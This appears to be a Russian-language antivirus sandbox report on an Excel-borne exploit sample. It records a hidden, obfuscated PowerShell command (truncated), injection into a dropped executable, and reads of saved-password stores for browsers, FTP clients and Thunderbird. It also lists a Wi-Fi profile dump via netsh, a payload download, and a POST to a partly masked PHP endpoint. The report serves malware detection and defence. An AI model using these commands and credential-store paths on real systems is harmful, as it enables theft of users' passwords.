Exploit.Siggen.63639

Техническая информация

Вредоносные функции

Запускает на исполнение (эксплоит)

'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function g1d586f {param($s8a61)$u6747f='p66f69';$n3c8af6='';for ($i=0; $i -lt $s8a61.length;$i+=2){$j928e=[convert]::ToByte($s8a61.Substring($i,2),16);$n3c8af6+=[char]($j9...

Внедряет код в

следующие пользовательские процессы:

a43864.exe

Ищет ветки реестра, отвечающие за хранение паролей сторонними программами

[<HKCU>\Software\RimArts\B2\Settings]
[<HKCU>\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions]
[<HKCU>\Software\FTPWare\COREFTP\Sites]

Читает файлы, отвечающие за хранение паролей сторонними программами

%APPDATA%\opera software\opera stable\login data
%LOCALAPPDATA%\google\chrome\user data\default\login data
%APPDATA%\mozilla\firefox\profiles.ini
%APPDATA%\thunderbird\profiles.ini

Изменения в файловой системе

Создает следующие файлы

%TEMP%\9ehmhlmr.0.cs
%TEMP%\cscdc5d.tmp
%TEMP%\resdc6d.tmp
%TEMP%\hgcyctxh.dll
%TEMP%\2vj7sjgo.0.cs
%TEMP%\2vj7sjgo.cmdline
%TEMP%\hgcyctxh.cmdline
%TEMP%\hgcyctxh.out
%TEMP%\2vj7sjgo.out
%TEMP%\2vj7sjgo.dll
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.word\~wrf{b61b0d44-c54c-4a46-a205-00c3d97c57f3}.tmp
%APPDATA%\a43864.exe
%PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\policy.vpol
%PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\3ccd5499-87a8-4b10-a215-608888dd3b55.vsch
%TEMP%\cscfe3d.tmp
%TEMP%\resfe4d.tmp
%TEMP%\hgcyctxh.0.cs
%TEMP%\apbhdqwo.dll
%TEMP%\resd067.tmp
%TEMP%\9ehmhlmr.out
%TEMP%\qsn6btdu.0.cs
%TEMP%\qsn6btdu.cmdline
%TEMP%\qsn6btdu.out
%TEMP%\cscc356.tmp
%TEMP%\cscc54a.tmp
%TEMP%\9ehmhlmr.cmdline
%TEMP%\resc367.tmp
%TEMP%\resc55b.tmp
%TEMP%\apbhdqwo.0.cs
%TEMP%\apbhdqwo.cmdline
%TEMP%\apbhdqwo.out
%TEMP%\qsn6btdu.dll
%TEMP%\cscd057.tmp
%TEMP%\9ehmhlmr.dll
%PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\2f1a6504-0641-44cf-8bb5-3612d865f2e5.vsch
%LOCALAPPDATA%\microsoft\vault\4bf4c442-9b8a-41a0-b380-dd4a704ddb28\policy.vpol

Удаляет следующие файлы

%TEMP%\resc367.tmp
%TEMP%\qsn6btdu.cmdline
%TEMP%\qsn6btdu.dll
%TEMP%\resdc6d.tmp
%TEMP%\cscdc5d.tmp
%TEMP%\hgcyctxh.0.cs
%TEMP%\hgcyctxh.out
%TEMP%\hgcyctxh.pdb
%TEMP%\2vj7sjgo.out
%TEMP%\hgcyctxh.dll
%TEMP%\resfe4d.tmp
%TEMP%\cscfe3d.tmp
%TEMP%\2vj7sjgo.0.cs
%TEMP%\2vj7sjgo.pdb
%TEMP%\2vj7sjgo.dll
%TEMP%\qsn6btdu.0.cs
%TEMP%\hgcyctxh.cmdline
%TEMP%\qsn6btdu.out
%TEMP%\9ehmhlmr.out
%TEMP%\cscc356.tmp
%TEMP%\resc55b.tmp
%TEMP%\cscc54a.tmp
%TEMP%\resd067.tmp
%TEMP%\cscd057.tmp
%TEMP%\9ehmhlmr.dll
%TEMP%\9ehmhlmr.0.cs
%TEMP%\apbhdqwo.cmdline
%TEMP%\9ehmhlmr.pdb
%TEMP%\9ehmhlmr.cmdline
%TEMP%\apbhdqwo.dll
%TEMP%\apbhdqwo.pdb
%TEMP%\apbhdqwo.0.cs
%TEMP%\apbhdqwo.out
%TEMP%\qsn6btdu.pdb
%TEMP%\2vj7sjgo.cmdline

Сетевая активность

Подключается к

'bn##aris.co':80

TCP

Запросы HTTP GET

http://pe####sandmay.com/eng/uploads/quakes.exe

Запросы HTTP POST

http://bn##aris.co/quakes/inc/52f72b5409b558.php

UDP

DNS ASK pe####sandmay.com
DNS ASK bn##aris.co

Другое

Создает и запускает на исполнение

'%APPDATA%\a43864.exe'
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function g1d586f {param($s8a61)$u6747f='p66f69';$n3c8af6='';for ($i=0; $i -lt $s8a61.length;$i+=2){$j928e=[convert]::ToByte($s8a61.Substring($i,2),16);$n3c8af6+=[char]($j9...' (со скрытым окном)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\9ehmhlmr.cmdline"' (со скрытым окном)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\qsn6btdu.cmdline"' (со скрытым окном)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESC367.tmp" "%TEMP%\CSCC356.tmp"' (со скрытым окном)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESC55B.tmp" "%TEMP%\CSCC54A.tmp"' (со скрытым окном)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\apbhdqwo.cmdline"' (со скрытым окном)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESD067.tmp" "%TEMP%\CSCD057.tmp"' (со скрытым окном)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\hgcyctxh.cmdline"' (со скрытым окном)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESDC6D.tmp" "%TEMP%\CSCDC5D.tmp"' (со скрытым окном)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\2vj7sjgo.cmdline"' (со скрытым окном)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESFE4D.tmp" "%TEMP%\CSCFE3D.tmp"' (со скрытым окном)

Запускает на исполнение

'%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\9ehmhlmr.cmdline"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\qsn6btdu.cmdline"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESC367.tmp" "%TEMP%\CSCC356.tmp"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESC55B.tmp" "%TEMP%\CSCC54A.tmp"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\apbhdqwo.cmdline"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESD067.tmp" "%TEMP%\CSCD057.tmp"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\hgcyctxh.cmdline"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESDC6D.tmp" "%TEMP%\CSCDC5D.tmp"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\2vj7sjgo.cmdline"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESFE4D.tmp" "%TEMP%\CSCFE3D.tmp"
'%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding
'%WINDIR%\syswow64\netsh.exe' wlan show profile